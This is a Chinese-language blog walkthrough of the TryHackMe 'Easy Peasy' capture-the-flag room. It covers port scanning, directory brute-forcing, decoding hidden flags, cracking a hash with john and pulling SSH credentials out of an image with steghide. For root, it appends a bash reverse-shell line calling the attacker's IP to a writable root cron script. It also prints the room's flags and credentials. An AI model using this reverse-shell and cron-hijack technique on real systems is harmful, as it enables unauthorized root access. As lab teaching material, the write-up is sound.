【Tryhackme】Easy Peasy(目录爆破,图片隐写,Cron)

天线锅仔

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

服务探测

┌──(root💀kali)-[~/tryhackme/EasyPeasy]
└─# nmap -sV -Pn 10.10.246.60 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 03:25 EST
Nmap scan report for 10.10.246.60
Host is up (0.30s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 829.53 seconds

80端口,打开是一个nginx的欢迎页面,源代码找到flag3

They are activated by symlinking availableconfiguration files from their respectiveFl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}*-available/ counterparts. These should be managedby using our helpers

65524也一个http端口,打开是一个apache的欢迎页,源代码无特别东西。

爆破80目录

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.246.60 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.246.60/_21-11-12_03-36-16.txt

Error Log: /root/dirsearch/logs/errors-21-11-12_03-36-16.log

Target: http://10.10.246.60/

[03:36:17] Starting: 
[03:37:38] 301 -  169B  - /hidden  ->  http://10.10.246.60/hidden/    

/hidden文件夹下有一张图片,下载到本地以后不能分离出文件,可能需要密码

继续爆破hidder下的目录:

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.246.60/hidden -w /usr/share/wordlists/dirb/small.txt 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                       
 (_||| _) (/_(_|| (_| )                                                                                                                                                
                                                                                                                                                                       
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 959

Output File: /root/dirsearch/reports/10.10.246.60/-hidden_21-11-14_09-45-18.txt

Error Log: /root/dirsearch/logs/errors-21-11-14_09-45-18.log

Target: http://10.10.246.60/hidden/

[09:45:19] Starting: 
[09:45:31] 301 -  169B  - /hidden/whatever  ->  http://10.10.246.60/hidden/whatever/

打开/whatever目录,显示:

<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
    background-repeat: no-repeat;
    background-size: cover;
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>

隐藏的p元素base64解密出来得到第一个flag:flag{f1rs7_fl4g}

爆破65524目录

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.246.60:65524/                                                                  

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.246.60-65524/-_21-11-12_03-51-03.txt

Error Log: /root/dirsearch/logs/errors-21-11-12_03-51-03.log

Target: http://10.10.246.60:65524/

[03:51:04] Starting:    
[03:52:34] 200 -   11KB - /index.html                                       
[03:53:12] 200 -  153B  - /robots.txt                                       

robots.txt显示:

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

md5解出来是:flag{1m_s3c0nd_fl4g},为flag2

下载easypeasy.txt文件到本地,grep以后得到flag3

┌──(root💀kali)-[~/tryhackme/EasyPeasy]
└─# cat easypeasy.txt|grep flag                                                                                                                                                                                                         1 ⨯
flag{9fdafbd64c47471a8f54cd3fc64cd312}
flagsrule
flags2
flags101
flagirl
flagflag
flagator
flag93
flag890
flag2006
flag11

检查源码是个好习惯

在这里好像走入死胡同了,回到apache页面,在源码里找到另一个东西:

<span class="floating_element">
          Apache 2 It Works For Me
    <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
        </span>

这个是base62加密,解出来是:/n0th1ng3ls3m4tt3r

浏览器打开隐藏文件夹,看到一张图片,查看网页源代码:

<html>
<head>
<title>random title</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg");
    background-color:black;


    }
</style>
</head>
<body>
<center>
<img src="binarycodepixabay.jpg" width="140px" height="140px"/>
<p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
</center>
</body>
</html>

john爆破哈希

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81保存到hash.txt,用john破解:

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# john --wordlist=easypeasy.txt --format=gost hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2021-11-14 10:01) 50.00g/s 204800p/s 204800c/s 204800C/s vgazoom4x..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed

得到一个密码:mypasswordforthatjob

图片隐写

我们把binarycodepixabay.jpg这张图片下载到本地,用steghide命令以及上面破译的密码作为解密密令,分离出一个secrettext.txt文件

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# steghide extract -sf binarycodepixabay.jpg          
Enter passphrase: 
wrote extracted data to "secrettext.txt".
                                                                                                                                                                                                                                                                                                                             
┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# ls
binarycodepixabay.jpg  easypeasy.txt  hash.txt  lost-places-1928727_960_720.jpg  secrettext.txt
                                                                                                                                                                                                                                                                                                                             
┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# cat secrettext.txt 
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

拿到初始shell

把上面的二进制转成文本如下:
iconvertedmypasswordtobinary

所以现在我们得到了一个ssh凭证:boring:iconvertedmypasswordtobinary

登录ssh,拿到user.txt

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# ssh boring@10.10.246.60 -p 6498           
*************************************************************************
**        This connection are monitored by government offical          **
**            Please disconnect if you are not authorized              **
** A lawsuit will be filed against you if the law is not followed      **
*************************************************************************
boring@10.10.246.60's password: 
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
boring@kral4-PC:~$ ls
user.txt
boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}

去到这个网站,用rot13解密得到user flag

提权到root

传linpea,发现有一个root执行的定时任务:

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

查看定时任务内容以及权限:

boring@kral4-PC:/var/www$ ls -alh
total 16K
drwxr-xr-x  3 root   root   4.0K Jun 15  2020 .
drwxr-xr-x 14 root   root   4.0K Jun 13  2020 ..
drwxr-xr-x  4 root   root   4.0K Jun 15  2020 html
-rwxr-xr-x  1 boring boring   33 Jun 14  2020 .mysecretcronjob.sh
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
#!/bin/bash
# i will run as root

看来我们有写入权限

写shell进定时任务脚本:

boring@kral4-PC:/var/www$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /var/www/.mysecretcronjob.sh
boring@kral4-PC:/var/www$ cat /var/www/.mysecretcronjob.sh
#!/bin/bash
# i will run as root
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

另外开一个shell监听4242端口,一分钟后收到反弹的shell:

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.246.60] 33184
bash: cannot set terminal process group (16165): Inappropriate ioctl for device
bash: no job control in this shell
root@kral4-PC:~# whoami
whoami
root

拿到root.txt

root@kral4-PC:~# ls -alh
ls -alh
total 40K
drwx------  5 root root 4.0K Jun 15  2020 .
drwxr-xr-x 23 root root 4.0K Jun 15  2020 ..
-rw-------  1 root root    2 Nov 14 07:35 .bash_history
-rw-r--r--  1 root root 3.1K Jun 15  2020 .bashrc
drwx------  2 root root 4.0K Jun 13  2020 .cache
drwx------  3 root root 4.0K Jun 13  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Jun 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   39 Jun 15  2020 .root.txt
-rw-r--r--  1 root root   66 Jun 14  2020 .selected_editor
阅读 523
4 声望
1 粉丝
0 条评论
4 声望
1 粉丝
文章目录
宣传栏